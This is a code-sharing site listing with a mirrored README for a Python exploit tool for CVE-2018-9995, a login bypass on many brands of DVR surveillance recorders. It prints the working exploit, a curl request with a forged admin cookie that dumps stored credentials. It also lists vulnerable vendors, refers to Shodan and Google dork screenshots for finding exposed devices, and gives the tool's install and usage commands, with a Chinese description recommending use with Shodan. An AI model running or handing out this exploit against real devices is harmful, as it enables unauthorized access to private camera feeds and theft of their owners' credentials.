CVE-2018-9995_dvr_credentials
所属分类:其他
开发工具:Python
文件大小:4708KB
下载次数:3
上传日期:2018-05-27 16:22:35
上 传 者:
沉默slen
说明: [Tool] show DVR Credentiales
通过CVE-2018-9995漏洞获取部分暴露于网络的监控设备权限,与Shodan配合食用更佳。
([Tool] show DVR Credentiales
It's an exploit tool which using cve-2018-9995 to get shell.
usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining Exposed credentials
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81)
文件列表:
screenshot\cow\google_1.png (71579, 2018-05-05)
screenshot\cow\shodan_1.png (72247, 2018-05-05)
screenshot\cow\shodan_2.png (191923, 2018-05-05)
screenshot\indoor\in_1.png (549432, 2018-05-05)
screenshot\indoor\in_2.png (302686, 2018-05-05)
screenshot\indoor\in_3.png (366412, 2018-05-05)
screenshot\indoor\in_4.png (599976, 2018-05-05)
screenshot\indoor\in_5.png (520173, 2018-05-05)
screenshot\indoor\in_x.png (730731, 2018-05-05)
screenshot\indoor\in_x1.png (431749, 2018-05-05)
screenshot\loginFront\login_1.png (28105, 2018-05-05)
screenshot\loginFront\login_10.png (24572, 2018-05-05)
screenshot\loginFront\login_2.png (69954, 2018-05-05)
screenshot\loginFront\login_3.png (69930, 2018-05-05)
screenshot\loginFront\login_4.png (49955, 2018-05-05)
screenshot\loginFront\login_5.png (71317, 2018-05-05)
screenshot\loginFront\login_6.png (97092, 2018-05-05)
screenshot\loginFront\login_7.png (167878, 2018-05-05)
screenshot\loginFront\login_8.png (32512, 2018-05-05)
screenshot\loginFront\login_9.png (32668, 2018-05-05)
screenshot\toolOutput\poc_1.png (13277, 2018-05-05)
screenshot\toolOutput\poc_2.png (12018, 2018-05-05)
screenshot\toolOutput\poc_3.png (19254, 2018-05-05)
screenshot\toolOutput\poc_4.png (23428, 2018-05-05)
screenshot\v\tbk_vision\indoor_1.png (224708, 2018-05-05)
screenshot\v\tbk_vision\login_1.png (42923, 2018-05-05)
screenshot\videoWall.jpg (94449, 2018-05-05)
getDVR_Credentials.py (3618, 2018-05-05)
LICENSE (35821, 2018-05-05)
requirements.txt (10, 2018-05-05)
screenshot\v\tbk_vision (0, 2018-05-05)
screenshot\cow (0, 2018-05-05)
screenshot\indoor (0, 2018-05-05)
screenshot\loginFront (0, 2018-05-05)
screenshot\toolOutput (0, 2018-05-05)
screenshot\v (0, 2018-05-05)
screenshot (0, 2018-05-05)
# [Tool] show DVR Credentiales
[*] Exploit Title: "Gets DVR Credentials"
[*] CVE: CVE-2018-9995
[*] CVSS Base Score v3: 7.3 / 10
[*] CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
[*] Date: 09/04/2018
[*] Exploit Author: Fernandez Ezequiel ( twitter:@capitan_alfa )
![DVR_wall](screenshot/videoWall.jpg)
### Exploit:
```
$> curl "http://
:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
```
## tested in DVR (banner/vendor ?):
Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MDVR Login
# On the Wild:
![DVR_dorks_2](screenshot/cow/shodan_1.png) ![DVR_dorks_1](screenshot/cow/google_1.png)
![DVR_dorks_3](screenshot/cow/shodan_2.png)
## Possible Banners frontend (web):
![DVR_login_1](screenshot/loginFront/login_1.png)
![DVR_login_2](screenshot/loginFront/login_2.png)
![DVR_login_3](screenshot/loginFront/login_3.png)
![DVR_login_4](screenshot/loginFront/login_4.png)
![DVR_login_5](screenshot/loginFront/login_5.png)
![DVR_login_6](screenshot/loginFront/login_6.png)
![DVR_login_7](screenshot/loginFront/login_7.png)
![DVR_login_8](screenshot/loginFront/login_9.png)
![DVR_login_10](screenshot/loginFront/login_10.png)
## Indoor:
![DVR_indoor_1](screenshot/indoor/in_x.png)
![DVR_indoor_2](screenshot/indoor/in_x1.png)
![DVR_indoor_3](screenshot/indoor/in_1.png)
![DVR_indoor_4](screenshot/indoor/in_2.png)
![DVR_indoor_5](screenshot/indoor/in_3.png)
![DVR_indoor_6](screenshot/indoor/in_4.png)
![DVR_indoor_7](screenshot/indoor/in_5.png)
# TOOL: "Show all DVR Credentials"
## Quick start
usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt
## help
usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining Exposed credentials
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81
## Pocs (Output) :
![DVR_poc_4](screenshot/toolOutput/poc_4.png)
![DVR_poc_3](screenshot/toolOutput/poc_3.png)
![DVR_poc_2](screenshot/toolOutput/poc_2.png)
![DVR_poc_1](screenshot/toolOutput/poc_1.png)
### Blog:
http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
I see you... ! xd
近期下载者:
相关文件:
收藏者: